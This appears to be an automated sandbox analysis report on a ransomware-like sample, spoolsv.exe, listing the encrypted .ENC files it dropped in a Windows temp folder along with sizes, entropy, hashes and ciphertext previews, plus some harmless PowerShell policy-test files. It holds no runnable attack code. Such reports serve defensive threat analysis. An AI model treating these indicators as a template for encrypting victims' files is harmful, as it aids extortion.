                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1332608
                                                                                                                                                                                                                                                      Entropy (8bit):7.999859181217617
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:24576:sBn7WrztKLDAOo9JmICnL3uHxdAgCt7DDzEbBeLWZ8RjIlp8auj+/CJsXJ:sBaXtKLuyAkgGzzEoLdVIwl+Z
                                                                                                                                                                                                                                                      MD5:0A89F22893982B1411F64599689C1782
                                                                                                                                                                                                                                                      SHA1:B8E5FAAB4DAC1E86A222B3B39BE64E4C8764FF45
                                                                                                                                                                                                                                                      SHA-256:381BCE91E17451E07404A82D0DCEF197D9498BFE9ADDEE5BB6C74C7029A302E1
                                                                                                                                                                                                                                                      SHA-512:9EFD9E2BFD03F27028F5619E9E35F9C6070D053A7EDCA2E642F25FA71C9AACB1E1E930B3FE94846451F6F3915C09778ECD7FAED738F06A0914E6A7CB09317A8E
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview: ...ELH/$.....,d.<_%.z,..)p..%.JF).M...B...E.v2o<......o...y.3I.L.n..7.5.....4bIW.........]E.4.h.......Q....9.co.D.;.^.4..D....60...#......s./XL+.#..o.g....0.:Q.....r.{B.g.cp.?U-r^.?..Yx.7...W.|.!E...E........ p..,._..)..1./...AKcRb..m..P....P.X.`......w`....m?.3b.gE........^U0..+z{suJ..u.[..>g5............Wd\.L...dW...!..$.Y....}..|....@.........;3t-J'J......'EE C.ob=.`...].}..!.._.X.f$@..t.......t..<a2Fa... ..=....W...+.x(..l?...........+E..~._....^...a..r..tK.(["..u......!_F\......"....:........n........N.\1_EV[.E....\e..".....!N.qo..3..,.ba.....v._...%.PD..p....10.?W~/V.....?S..;:.c$...q..j.e.z.3....4Vt..boW.7.?J..Z....J......O...2d|....gD..~..3..>.&.5oXz.X..;....n.....s.)Gf..f.......i................_".qw.Z.7w2G'..Db...}..U..p$A9.... h.`....._..g@ ...'...h....NJd1.......r.`/.G..`..#;..E.+,|8..2y..-K.....i......k..<a8B[..W....._Z-m7...Y...*..Kr...'N...Mn.P.|"?..2>..P.#...Q+V..y.5...A.g$$tKX....(.5.......X.....wOBq..^{..%.BXtytK..aBn.....$

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24592
                                                                                                                                                                                                                                                      Entropy (8bit):7.992505621308184
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:N8ydGBSxI0C7ZN3LGbOennsmq9N4d5YjJeJAICY+LnTgj4MbRTQityl:N/dGw+7b3kOenncPkAA+7Tgj4MeiQ
                                                                                                                                                                                                                                                      MD5:2004E8547E63C371FB52622D59CE55A2
                                                                                                                                                                                                                                                      SHA1:7F1B14D8A93901F8BCF69992CF96551DB760A401
                                                                                                                                                                                                                                                      SHA-256:98CAB1D5DE4BB1448E4EE70C06FF518EE60981782832455131630E55B1C18287
                                                                                                                                                                                                                                                      SHA-512:BAB7B020CF61D8C911D8BD7E6878E8F3BCA56E4E9F1E446E7DB44774CEBD622DFD333E7EB733967991F4C79E6B07AFD1D7B6E815C51A4C9AF1209CB7E4726338
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*..........@.F.N...r......EYO,A>.G.....S...x....2ll...kH...WFI.\./Cp.NE...eK...v.0..E..W.{....$3.@D.c:..a.,....Dz..OE.}".....#...|.n....kz....Q5....ZJe..[.0....@....s.J8c..q..h9...B....(i_......91"..bYx...]F..Y?$.*.5.......}.L.W......Ys.\.xw.3....J.....].A6.s....z..n.!~....0...V.p.a..........4.c...."...e...[.0.>..%...c..h.z......v....lJ.p.....3no.x..\p.u.VC....5..K...V..kl.6L..........$..Yi.....PD>.zd...v.i....&.M7....%d.S.(...o.q(..Nc0..........!u`N.....;....a.6=.._q0...8.=C.&L...;NBW.$../...SL..R.J..On.?..2g.i.... ..d...../..Cm9.8.F'.ne?.......V..E..g...a.......R.. ......X".-+....]..t.IK....9f.....(I.4j.....q..w.|e..i.a......~....iT. 8...5.]B....H...n7...N.........C.L.._...c8.@S........?....QW...'.......2..4..GW(...7.......,...%yi.,ZDQ0.&..O......B;..O...P...pC>...xN.R.o..U...)..h......_|....U.......-=5..j!..J..;...6.i.<...nX.P..b...@6...[$.....G..HI,.Uy...1..Z1R...!...)T.!.Z.tI8-Fp..&.~.....X.b.3....=...P..k~5J...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):66224
                                                                                                                                                                                                                                                      Entropy (8bit):7.997416761020315
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:v1wPqCphVlmHm/HmabJVxSDYv9FNmmE/a5ddmQjTCW:viP/tl6+DkDgrET/zE
                                                                                                                                                                                                                                                      MD5:688D89874A66E58E09B81904067D5C79
                                                                                                                                                                                                                                                      SHA1:340EEF0514F827E03BAC621E815D87537552236D
                                                                                                                                                                                                                                                      SHA-256:B1E5184C72CA9EF2EC9DAEBCA63085362498DA96DFE006AABA685C0F4786AD47
                                                                                                                                                                                                                                                      SHA-512:76E8D21066759254FEE3BCC26A5578505DED93158F966BEE69FF053D637CC040007463B6EDD561AB4D841A91B150ABF696CE58DC8D073FB7FEC82AF8196EF055
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:...`.y..E........Bf...e.wo...X..&.....-...k2.......r.>..t.z..NN...-...!C U.i.>....F.....r`......u!7xZM#.y...w.B.x.=..i...l..@..V-1.,{.\..i|......H..0.I...Z.2O.%...lhf..Do..<.dK0PM..........?Z.V{.:.[0..p..G.8....J%H1lbO+.O.m.D.:..m.q.X"..9..#...F..`2.e8..$.C.2.........J...1+..,L..W89..AB.P..hW.".....n.....;.....V.of.Q"....W...r.....uw..u/Z..?o.-;o....s....b.Wj..14.d\Z...pLr.v...D.Y!.T...Q....(w@.sh-.8...*...o'2ZW.Cy..[...iH...].e.h:+......y.X\.Y.4H.|..'l.+.yu...!.c.>a..(@M...X.en.[.+`Qj...G;.)...|..NCn..s..GcU,......)\).....@L..z.....L..vXR&........@u_.....gg}....F...H.u..$;U......X..wb'.r9 &.h..C..I.......,...Y*..kA.E.Y...l....Ez..W$...<7.2...x'..HE..a.!..@.t....C.w...d.=I..`ki.d+_.../..._..lWP...4...[...}^..n..ol7._...>...N...n....\...*e...s.&m+i.5.....2..C.....1..n..`:l..../Q......./...h4..l.dH.<O.j>N..=.F....I.ME.9Ap....Eli.~n...g=.. j..;...I..=....r...w .....k...1..9#...l...../#.%..'$..........V)a.W..Q....`...&.0.s...M_.J...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\user-PC-20231005-0843.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):38688
                                                                                                                                                                                                                                                      Entropy (8bit):7.995582572449776
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:dZOBS5twIeYIt8QT6fcgTgd3EqobIlsaFdIgTb7xmwuZ2i4pQpHiE20vd:X2gPeX8QT6fcgm0qoUCyjb7UB2ili0l
                                                                                                                                                                                                                                                      MD5:C2CE73D27DA380011DDABF7C7D1FE717
                                                                                                                                                                                                                                                      SHA1:968F421DBB41FD574F0197A746ED5A9FEFCB214D
                                                                                                                                                                                                                                                      SHA-256:7D368EBEF4D220D27C396138F1AB38952EDA1272BAD4B61E8B46437A48C2B212
                                                                                                                                                                                                                                                      SHA-512:3DAB659C236CFF93B3C9B14A6A04935D509EE3A54E7E3A268049C6341F443E9A7B1620B606B394BD036B2A70F01301E557C21C171E54C79700EDD69A06E9416F
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:$.A..,Y......c..8.n.#..3..;".Zh4?{4M.kEW....U./.Q.,j..5.V.m..j.=.E.....d.....L.(.%..x@J.C]q....K.....u...,..X..dp...b......Kd..=.X..t..d^k.5so\..-....P...+.....-....x...]......G....6.}.!.j%4S1tN-[.F....f..A....c..c..av40BRk:'..[.ZC...).[......e<..'..W..Bk'P:..Q..".W...n.$....,..A.{.w..f..K.`2.O..........6.y.....Q....n|T.Q...cF..A.z\....F.LI^.oTa}...8"..a.j..'.3....X.s.....T...E.\YB.5..N..l.W....p..|0...O..Y..A A.....'.A.....O..%.....@%.?Z..]j.~..m..8.!..hq....E.P..x..I......Wz.H...:3...$J_vm.+J.g.c.N....X>.<.o.L&!..C.i.....a.b.,......Yw.>.<..$.m@.0.P..1...Q....5/B1.FP..... 5.c.).zSZr...s.T....H..H..;=..../w..Y....@O..}.F_:&.LK.x/...'.S...Y.$r).3/....aE7..!%...}c.|y..e\...uR{Ik@.!/..m......`A....8.o....[.s....O......E.<r....dwK........O&;.....4@..R[c....3.3T$...htB..#.L..!l..q.1.\x".....C.z.8.....fI.W...m./.?.aajM.,U.,bV.P....o)uq.,.mvn...".2..Ee.N51.U...)fa?.,./iC.G..wpF...D.......m............./.a..?.YFR2...."F.I....W....W.*....P.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\user-PC-20231005-0844.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):97152
                                                                                                                                                                                                                                                      Entropy (8bit):7.997834544796325
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:vyyur1RlA1VltdsRtEZSwJAcTu/cvSu6A7aBTGMQqW2gFcEYKq0n3J:qySvlA15i/ENTu/cvSu6DBVQqWdcEnqQ
                                                                                                                                                                                                                                                      MD5:8B53DF3D50EC3C1119A0C21250C1A35C
                                                                                                                                                                                                                                                      SHA1:117704F95A12B4D14E00744E1D9D6689F01CB082
                                                                                                                                                                                                                                                      SHA-256:C55694D8C0129561CB8515E3EA3ED79868445B550860F55C39D5390AB0825219
                                                                                                                                                                                                                                                      SHA-512:B23957AE189A019B32AF49E89904363CB687059D3C28B3459C77E272168619AEF4FF701AFD151EB4646632E578B430517AD341AE378F6811E69E42D2D573D31D
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:$.A..,Y......c..8.n.#..3..;".Zh4?{4M.kEW....U./.Q.,j..5.V.m..j.=.E.....d.....L.(.%..x@J.C]q....K.....u...,..X..dp...b......Kd..=.X..t..d^k.5so\..-.....4..1..},.z..7...+{1U.Y5..p.|......yAW..cx6Z[ ..7.$...z..`..H.Vy..J...K.-..5{q..ec....wb?u..5.g..`7....c+.|V.0V....H..G .r#.......#n0.k.:b..q.....?b}....7.*.)j....m..H...J...K.....(.S.C._inz.U;...2.U.`W,..k..>....^......L...;..^.;.?Ap.xt2..GGn4....3..jsHf#........a.8.D..=84...4..T...\v.b........I*_....7.?V.-....b.H.n1.....>g..h..D...+.!y........M...S.S.."..X.(.....h..M[..P....]y..d....d..c.d.[.%w4.^...Z..py...e=X......L.."/ua...Ae.D9.c....mV.zT..$T.p.~pm.b..s.=..}..f.. .u'x..@AMk2.p...R.F.~.Nx.v3.\..cX..J..\66.e...H...](^.V.Uj.Fz.>eb.P#.a....>.X..yoe.L.......[\...oQ.........GG.U.`U.....4.....)>Y..6...:.`o..C.../<F)rl<d.Y.KZ.m7.01....=..j.........P...T.6.O. ......t..G0..l.k..h.A.D./.o.[..v~.G.nF...w.A..CXF4.(.~...X_.AE.#.K...[..U..k.:N..w$.>.`N.`..z..U~...+N.G..>.@.|L....-.2....9.b....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\user-PC-20231005-0847.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):394688
                                                                                                                                                                                                                                                      Entropy (8bit):7.99959600781784
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:czoiBKZN4BkpD5zNrfveoChAgTO+EMobLUE:KbImBk1rfveocA6Ncl
                                                                                                                                                                                                                                                      MD5:A62CA2F5674E15CB9678999BE2BB2D00
                                                                                                                                                                                                                                                      SHA1:4D8BC4888B3A9B64702030743C8032065750C99F
                                                                                                                                                                                                                                                      SHA-256:8C8E20A33D6EF804B0F2772D15DF79EEE7FB12F5D5B6F32009800FF126581875
                                                                                                                                                                                                                                                      SHA-512:A7921B48A2D449E8E6810C6D5CCDBD52B80BCC4AE7AB5919628DCFCE61A5B4B01262C6D77578FDACBCC25F9EF91A7126EC2FAD8BB64815B01543DBAB262F25BE
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:$.A..,Y......c..8.n.#..3..;".Zh4?{4M.kEW....U./.Q.,j..5.V.m..j.=.E.....d.....L.(.%..x@J.C]q....K.....u...,..X..dp...b......Kd..=.X..t..d^k.5so\..-.....2..x.Q..&..._J ..GS;....j.;..h..D...%E_x....9X[.Q?K.#C.K..G....n!.nS.J4....Do%nU...6+V!.8.vT:.{..m.=qn,h..G...A....b!..sa...i.&o.F.gF.eJ.I.._.1..1....u....1..... ../.4.3.........Y).,. .,.rO._..r........Z.,....pt..B..S(..l..~H...3..T{.*...i.E.0I.\.!e......W{P7.a..}.?.M..O.Vj{..5.G....]CK......Iz.cA.- .....;..R.#....]..}....=.e_...i...??...c2.P.g-e#..4....I..X.EA.._.,...NH.....I..g_....F..fG.a.....l.q'.....J....D.d.|X..8.8....6.;1M..N.0.9..5..29..?...?X.dh..H...o&.=..zLA....y._.|F..s...`.4...J.A.g.....Nz.#2..I.f#...R..u.r..G.......5...i$....>..X.q..Nf......Q...G..:..Pk.E.S.a4d7S>-.8dN...'.. FV.....2%.b............~.`R.....q..on.j.5...V..L...d&..OP......Ba .B(.......l.V.l.u.G..5......+...WQ..N7j..fgo.ql./.R...>.+d..y....I..h..J.i.....X*.h6...OBAl3H.....P.C.).x...D.$/...o5.."d..~.0;@o....0Sr..y].

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\JSAMSIProvider32.dll.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):120848
                                                                                                                                                                                                                                                      Entropy (8bit):7.998510185663107
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:HRzUq897H9FPEDsnSl4sFycJkeFuyNLYn8Dm7Zjg:HNUq8NHfcDpldkeFTan97Zs
                                                                                                                                                                                                                                                      MD5:148F1D428160279A9F075657B8C78219
                                                                                                                                                                                                                                                      SHA1:2088FD459757BCC7D39F07AB767A6A00D9F74E7A
                                                                                                                                                                                                                                                      SHA-256:0F0AE83DF8A49EDB4A2A3D2B8FDAF44E6814458DA08C1A5327E21A349D6F3C1B
                                                                                                                                                                                                                                                      SHA-512:286E7E7A6215521586EF5782D4D43BB9ED3139221D9F1BBD2730E5A7A0EBCD5B6628BAFAB8F450F97CB68DE3DF300FF9111986B5682244F98D08E7DECDAA957E
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:R[/D..J.b.s=.k3.p.X....}I}...|..m.7U...[.I.1<".to.'|.C...."..e'..u..o.r.._...h>.....~j.....u.a........k...Z.-...."8\..?.P.L^7t7.1.QMR.=.M...W..49.,........5.....tN...8.>.......K@..."'..w ..`....../D*.C.aSZI.4VW..2~.?.C.{.G...,......c$.#.......lC.3.............P.Y@.............i|4....qX..6....n,..'J..k!.....K..0....:....d..[!..E...?e.f.._..([S5..B.3A..+IO..O.uW.Z.............h............l_n>.p..8...2.L..j\.V....,h.[......N~..[q.\.";...}...P..pJ.....C1|x.~*.U?.&.rVg..A. (.G.....XxH.5Dg.."@b. ..>.'........H.P.8.......1.l...<....u_../M"iL].".....j;..*..(..xxK-.O..<.....m2T..Q.=...*..y......bO..R...BXJ.1.:b.;yi.V.-......`X...7,'.+`H3Z.9[uI.x...g|...g..Y.mDfZ....~...7n...M?|.,s...zH.7s;u. [...MB....t.=.)...x..[?.z..9P.Z...hyv......0.~R..0.....R.......J....<....S7..k....V0\oz....m..=...EC.../.$.l.=H...T*dMeI.....v4.o;5.W}.B8..%lx.P..*.F..'..|0.......@.t.^...T....-... .L.lPi......!..(.{q.......n...#..h.a...I..~k.l....o..&.4...oG!..".P_V..........1F..8b

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):135184
                                                                                                                                                                                                                                                      Entropy (8bit):7.998634759085608
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:yHfJX5m2969SBKgrVzJuHvsBHaAY68OlipNJBg63KtApDbGLCDXrw4:sZ5D6kt4jAmpbE48CDl
                                                                                                                                                                                                                                                      MD5:62EB887728BC09C9880B92E09C064507
                                                                                                                                                                                                                                                      SHA1:2F9E05C0988158FD7FA2833837958417BA7C5B71
                                                                                                                                                                                                                                                      SHA-256:DF01F84AE03CE93859A2583BB7B3ECB80481E09BB0E98B84BE5F3C64E82F1A76
                                                                                                                                                                                                                                                      SHA-512:F59D4DDAFB6CF493D58786289CEFD11D991E4DB9FE1E92FBA9C5E6A435DECD98EECEDD25D425EB494E9698C6294EC3A7C9EF1359598527A669B4C3F881322606
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:R[/D..J.b.s=.k3.p.X....}I}...|..m.7U...[.I.1<".t1Noi(.........O. .=..Em...........Q...3.Fv*Fp...@......{T....c.$..kh2f|...Z|.+.Y.....x.9..#./.....h...1...hd...<...,.....s.sW/L...I6.pV.M....H0..!i<V.^..k...kJ..^q.M>*.G.....4%Y...(E..SA...B.M..8..r....F.5.d.`g..~E\.G..|.D_A.5UaL.k...O)..r.F..d..ZMb...2C.............K...0.yA,...N......&...2..O1....J2..V.."$...5...OU...}:.Z...{...N......~....Bq`.A$=...?.l....hIn.:.w....v+...N2.Q...t.M.1$.,.&..=Jn.r..J...c-.b...[.]F=...*.l.A.<Y...&UV.... 3aY..o....v.[.E...........:....\...&....8...tJ......7.P?..nyZF..!.;.f....e.r..K...N.S....T.....],.d..Gg:A..6>r..........k..9.6.Q..?...</ag:..xE\+.....}4 (OR|..7....G_..y......Lb..V.....F..+..w...8..{....z...}.i....~.........;...>....L.....Ch.8x.]..#..#.g.TG3.....2....>QZf0.....n.......E .~r.... .g.{...=....P.l..%.. W...Q.A.~n.v.D.;k.9.U.1.....g/.*.@.....Djp+..ZU......];A..h.....B......... Lh..l&....X.rm.%..2..7.&mF(.ZUD.&...B/vQ.....,fO......}.P.....X....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Symbols\pingme.txt.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03pkfv4q.53t.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2eo4ukre.fbv.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dslxdlh.53o.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pepn2ii.eai.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkfztvuj.xst.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhiq0lod.4ud.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
